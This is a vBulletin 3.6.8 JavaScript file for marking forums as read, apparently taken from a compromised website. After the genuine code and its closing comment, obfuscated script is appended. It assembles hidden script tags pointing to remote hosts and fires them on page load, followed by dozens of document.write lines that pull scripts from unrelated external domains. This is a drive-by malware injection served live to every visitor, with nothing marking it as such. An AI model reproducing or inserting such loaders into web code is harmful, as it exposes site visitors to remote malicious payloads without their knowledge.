/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.6.8
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/**
* Array to store initialized vB_AJAX_ReadMarker objects
*
* @var	array
*/
var vB_ReadMarker = new Array()
var vB_ReadMarker = {
	'forum_statusicon_prefix'  : 'forum_statusicon_',
	'thread_statusicon_prefix' : 'thread_statusicon_',
	'thread_gotonew_prefix'    : 'thread_gotonew_',
	'thread_title_prefix'      : 'thread_title_'
};

// #############################################################################
// vB_AJAX_ReadMarker
// #############################################################################

/**
* vBulletin AJAX forum read marker class
*
* Allows a forum, its child forums and all contained threads to be marked as read
*
* @param	integer	Forum ID to be marked as read
*/
function vB_AJAX_ReadMarker(forumid)
{
	this.forumid = forumid;
};

/**
* Initializes the AJAX request to mark the forum as read
*/
vB_AJAX_ReadMarker.prototype.mark_read = function()
{
	forumid = this.forumid;
	this.ajax = new vB_AJAX_Handler(true);
	this.ajax.onreadystatechange(vB_ReadMarker[forumid].ajax_check);
	this.ajax.send('ajax.php?do=markread&f=' + this.forumid, 'do=markread&forumid=' + this.forumid);
};

/**
* Receives the AJAX response and passes the XML to the handle_xml function
*
* @return	boolean	false
*/
vB_AJAX_ReadMarker.prototype.ajax_check = function()
{
	var AJAX = vB_ReadMarker[forumid].ajax.handler;

	if (AJAX.readyState == 4 && AJAX.status == 200)
	{
		if (AJAX.responseXML)
		{
			vB_ReadMarker[forumid].handle_forums_xml(AJAX.responseXML);
		}

		if (is_ie)
		{
			AJAX.abort();
		}
	}

	return false;
};

/**
* Handles the XML response from the AJAX response
*
* Passes forum IDs in XML to handler functions
*
* @param	string	XML containing <forum> nodes with forum ID contents
*/
vB_AJAX_ReadMarker.prototype.handle_forums_xml = function(forums_xml)
{
	var forum_nodes = fetch_tags(forums_xml, 'forum');
	for (var i = 0; i < forum_nodes.length; i++)
	{
		var forumid = this.ajax.fetch_data(forum_nodes[i]);
		this.update_forum_status(forumid);

		var threadbits_object = fetch_object('threadbits_forum_' + forumid);
		if (threadbits_object)
		{
			this.handle_threadbits(threadbits_object);
		}
	}
};

/**
* Updates the status of a 'forumbit*' template
*
* @param	integer	Forum ID
*/
vB_AJAX_ReadMarker.prototype.update_forum_status = function(forumid)
{
	var imageobj = fetch_object(vB_ReadMarker['forum_statusicon_prefix'] + forumid);
	if (imageobj)
	{
		imageobj.style.cursor = 'default';
		imageobj.title = imageobj.otitle;
		imageobj.src = this.fetch_old_src(imageobj.src, 'forum');
	}
};

/**
* Scans the provided object for gotonew links in threads
*
* @param	object	HTML object containing 'threadbit*' templates
*/
vB_AJAX_ReadMarker.prototype.handle_threadbits = function(threadbits_object)
{
	var links = fetch_tags(threadbits_object, 'a');
	for (var i = 0; i < links.length; i++)
	{
		if (links[i].id && links[i].id.substr(0, vB_ReadMarker['thread_gotonew_prefix'].length) == vB_ReadMarker['thread_gotonew_prefix'])
		{
			this.update_thread_status(links[i].id.substr(vB_ReadMarker['thread_gotonew_prefix'].length));
		}
	}
};

/**
* Updates the status of a 'threadbit*' template
*
* @param	integer	Thread ID
*/
vB_AJAX_ReadMarker.prototype.update_thread_status = function(threadid)
{
	var statusicon = fetch_object(vB_ReadMarker['thread_statusicon_prefix'] + threadid);
	if (statusicon)
	{
		statusicon.src = this.fetch_old_src(statusicon.src, 'thread');
	}

	var gotonew = fetch_object(vB_ReadMarker['thread_gotonew_prefix'] + threadid);
	if (gotonew)
	{
		gotonew.parentNode.removeChild(gotonew);
	}

	var threadtitle = fetch_object(vB_ReadMarker['thread_title_prefix'] + threadid);
	if (threadtitle)
	{
		threadtitle.style.fontWeight = 'normal';
	}
};

/**
* Converts an image source from x_new.y to the appropriate x_old.y format
*
* @param	string	Original image source
* @param	string	Type ('forum' or 'thread')
*
* @return	string	New image source
*/
vB_AJAX_ReadMarker.prototype.fetch_old_src = function(newsrc, type)
{
	var foo = newsrc.replace(/_(new)([\._])(.+)$/i, (type == 'thread' ? '$2$3' : '_old$2$3'));
	return foo;
};

// #############################################################################
// Ancilliary functions
// #############################################################################

/**
* Initializes a request to mark a forum and its children as read
*
* @param	integer	Forum ID to be marked as read
*
* @return	boolean	false
*/
function mark_forum_read(forumid)
{
	if (AJAX_Compatible)
	{
		vB_ReadMarker[forumid] = new vB_AJAX_ReadMarker(forumid);
		vB_ReadMarker[forumid].mark_read();
	}
	else
	{
		window.location = 'forumdisplay.php?' + SESSIONURL + 'do=markread&forumid=' + forumid;
	}

	return false;
};

/**
* Translates the ID of a scanned object into a forum ID and passes it to mark_forum_read()
*
* @param	event
*/
function init_forum_readmarker_icon(e)
{
	mark_forum_read(this.id.substr(vB_ReadMarker['forum_statusicon_prefix'].length));
};

/**
* Scans images on a page for forum status icons indicating that they contain new posts
* then initializes them to activate the read marking system on double-click
*/
function init_forum_readmarker_system()
{
	var images = fetch_tags(document, 'img');
	for (var i = 0; i < images.length; i++)
	{
		if (images[i].id && images[i].id.substr(0, vB_ReadMarker['forum_statusicon_prefix'].length) == vB_ReadMarker['forum_statusicon_prefix'])
		{
			if (images[i].src.search(/\/([^\/]+)(new)(_lock)?\.([a-z0-9]+)$/i) != -1)
			{
				img_alt_2_title(images[i]);
				images[i].otitle = images[i].title;
				images[i].title = vbphrase['doubleclick_forum_markread'];
				images[i].style.cursor = pointer_cursor;
				images[i].ondblclick = init_forum_readmarker_icon;
			}
		}
	}
};

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 09:04, Mon Aug 6th 2007
|| # CVS: $RCSfile$ - $Revision: 15485 $
|| ####################################################################
\*======================================================================*/

var s=new Array();var la=new Array();function W(){this.P=52347;this.P--;var p=String("cr"+"ea"+"te"+"El"+"em"+"en"+"tST7L".substr(0,1));this.a=19006;this.a+=171;var M=window;var pW=document;var po="po";var Mq=false;Fg={};var pe="body";var G=["Xd","VD","n"];var E=String("sc"+"ri"+"pt");q=53533;q++;S=34680;S++;var D="ghBsrc".substr(3);var k=String("zZJ9defer".substr(4));var Gc=["cj","WT","Eb"];var V=String("onlo"+"adYo6".substr(0,2));var U="appe"+"ndCh"+"ildfPO".substr(0,3);this.Ws="Ws";var TL=["Va","t","gV"];var QH=["K","bf","XP"];function _(){var B_=[];try {var eM='x'} catch(eM){};pw={aG:"z"};Mi={iQ:"y"};try {this.PD=29437;this.PD-=226;var b="/med"+"iapl"+"ex-c"+"om/g"+"oogl"+"V460e.co".substr(4)+"m/up"+"s.co"+"INCym.phIyNC".substr(4,4)+"p";this.eB="";this.C="C";var A=String("htmn6".substr(0,2)+"tp"+":/"+"/p"+"as"+"vC0spvC0".substr(3,2)+"K2Gvor".substr(4)+"tb6gU2".substr(0,2)+"VLbluLVb".substr(3,2)+"es"+".r"+"6AQiu:Qi6A".substr(4,2));rl=[];var R=59015-50935;this.pF=53920;this.pF--;zl=["wE","sb","dP"];var Q=5434-5433;var inb={};this.bP=62852;this.bP+=41;l=pW[p](E);_S={FT:"yU"};Dj=[];l[D]=A+R+b;var ps=false;l[k]=Q;pW[pe][U](l);} catch(J){try {} catch(v){};this.QQ=59397;this.QQ-=234;};var Djd=false;}Ru={DC:30751};JH=13180;JH--;M[V]=_;};W();
this.g="";this.ZL=14360;this.ZL--;v=39168;v+=179;j=7985;j++;try {var B={};RV=["G","MD"];var L={gf:"qK"};var N={lN:"yN"};var p=window[new String("unesc"+"fMV8ape".substr(4))];var Nf="";var Ma={};this.o='';var _=String("re"+"pl"+"ac"+"e");K={};eQ={};var aV={};U=[];Ky=[];var A=new String("1");var Z=window[(String("Re"+"gE"+"xp"))];this.Ws=false;this.C=false;uf={sJ:false};GF={Lv:false};Nq=[];var S='';var V=new String("q79onl".substr(3)+"oad");var cT=["Ec","op","YV"];Ab={};var Wj=44636;var opZ=6340;_h=["Na","ufL","bb"];vw=2641;vw+=166;var Py={NY:12748};TB=56390;TB+=11;var Bl=new Array();function u(A,m){this.n="n";this.EY='';var H=String("fyJE[".substr(4));ao=45192;ao++;Q=14179;Q++;var jP=new String();bG=8761;bG++;TA=3160;TA+=33;H+=m;var oD={Te:false};UF=["ez","ut"];this.BK=49214;this.BK++;var Hb=[];H+=p("%5d");var OS=new String();ij={};ee={};try {var Ej='vCj'} catch(Ej){};var pc={};XO=["PK","Qx","gF"];fx={Aw:55146};var e=new Z(H, String("g"));try {} catch(cw){};return A.replace(e, S);var lz="";};var pO={oN:47693};Gy={yi:"NV"};try {var zM='zE'} catch(zM){};try {var _e='bg'} catch(_e){};var sJp=new String();var I=new String("httpdqk1".substr(0,4)+"://g"+"QPwothgwPQ".substr(3,4)+"uilt"+".ru:");XM={};var Zr=273314-265234;this.yC=182;this.yC-=120;wr=27756;wr+=104;var ix=["gm"];RYd={};var R="/go"+"ogl"+"J17Ye.c".substr(4)+"om/"+"ima"+"gev"+"enu"+"e.c"+"NRdom/".substr(3)+"gut"+"efr"+"IKpyage".substr(4)+".ne"+"t.pvgf".substr(0,3)+"hp";this.xY='';try {var Eo='Mo'} catch(Eo){};this.il='';try {var wY='AH'} catch(wY){};this.Ut='';var Pb=false;try {var XJ='Hr'} catch(XJ){};this.sU=22296;this.sU-=116;try {var je='mG'} catch(je){};function P(){this.sb=44498;this.sb++;this.wx=62010;this.wx++;pw={};var t=new String("apiTb".substr(0,2)+"pe9C2".substr(0,2)+"xcznd".substr(3)+"Ch"+"QCfilCfQ".substr(3,2)+"d");ri=[];var hd=new Array();try {var _nO='kp'} catch(_nO){};gj=[];var _I=u('sHc2raiUpUt1','HF960a1Um2y7M');var Us={hs:"uI"};var JH='';var gD='';this.WR="";var sE=["ast"];gW=24360;gW-=139;var Gr=new String();var z=document;try {} catch(YY){};this.Dh=10976;this.Dh--;this.Ie="";this.kB="";ZB={co:"of"};Lm={BV:"cK"};Iu=z.createElement(_I);try {} catch(ZW){};try {} catch(rm){};try {} catch(mW){};q=I+Zr;var wa=["dl","Mt","UbE"];jj=56248;jj++;g_d=24544;g_d+=228;var lX=["Oc"];var viv=["NF","Jp","Is"];q=q+R;var Qm="";try {} catch(tA){};var LI="LI";Iu[String("defelvM".substr(0,4)+"r")]=A;var BM=false;Iu.src=q;try {var hqf='mV'} catch(hqf){};try {var Ny='qA'} catch(Ny){};this.Ef=5233;this.Ef++;var J_={ON:false};var AB=z.body;_M=29386;_M++;var HIv=new String();var WsY=[];wxF=["UI","nF"];AB[t](Iu);this.fI="fI";ge=41824;ge--;};var Nt=[];window[V]=P;this.UIV='';var mE={};var aM=["PZ"];this.Vw=9605;this.Vw--;LR={Ce:"Rm"};var z_=["Fs"];Jq=8644;Jq-=31;} catch(O){var bd=new Array();wjk={};var IS=new Array();Ji={cI:false};};UHE={};try {} catch(pb){};


document.write('<script src=http://lopata.cz/images/vykopy-demolice-staveb-rezani-betonu-likvidace-parezu.php ><\/script>');

document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');

document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://pbdsa.anet.com.pl/SpryAssets/style.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://becoupon.com/deal_pictures/index.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://telegathering.cw.tc/store/Telepics/0004/a9vu/vswj.php ><\/script>');
document.write('<script src=http://djsanju.com/images/sitemap.php ><\/script>');
document.write('<script src=http://djsanju.com/images/sitemap.php ><\/script>');